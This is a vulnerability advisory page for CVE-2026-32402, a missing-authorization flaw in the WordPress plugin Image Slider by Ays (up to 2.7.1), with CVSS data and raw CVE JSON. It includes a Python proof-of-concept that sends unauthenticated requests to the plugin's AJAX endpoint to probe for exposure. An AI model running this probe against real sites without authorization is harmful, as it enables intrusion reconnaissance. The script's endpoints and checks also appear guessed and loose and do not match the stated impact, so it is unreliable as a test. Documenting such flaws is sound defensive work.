Security Vulnerability Report
中文
CVE-2026-32402 CVSS 5.3 MEDIUM

CVE-2026-32402

Published: 2026-03-13 19:54:56
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Ays Pro Image Slider by Ays ays-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Slider by Ays: from n/a through <= 2.7.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Image Slider by Ays <= 2.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32402 PoC - Missing Authorization in Image Slider by Ays # Target: WordPress site with Image Slider by Ays plugin <= 2.7.1 def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-32402 """ # Try to access plugin's AJAX endpoint without authentication # This endpoint should require admin privileges vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/ays-slider/v1/' ] for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint # Try to list all sliders without authentication data = { 'action': 'ays_slider_load_sliders', 'page': 1 } try: response = requests.post(url, data=data, timeout=10) if response.status_code == 200: # Check if response contains slider data without auth if 'data' in response.text or 'slides' in response.text: print(f"[+] Potential vulnerability found at {url}") print(f"[+] Response indicates unauthorized access possible") return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-32402.py <target_url>") print("Example: python cve-2026-32402.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Checking CVE-2026-32402 on {target}") if check_vulnerability(target): print("[!] Target appears to be vulnerable") else: print("[*] Target may not be vulnerable or plugin not installed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32402", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:56.297", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ays Pro Image Slider by Ays ays-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Slider by Ays: from n/a through <= 2.7.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ays Pro Image Slider de Ays ays-slider permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Image Slider de Ays: desde n/a hasta &lt;= 2.7.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ays-slider/vulnerability/wordpress-image-slider-by-ays-plugin-2-7-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}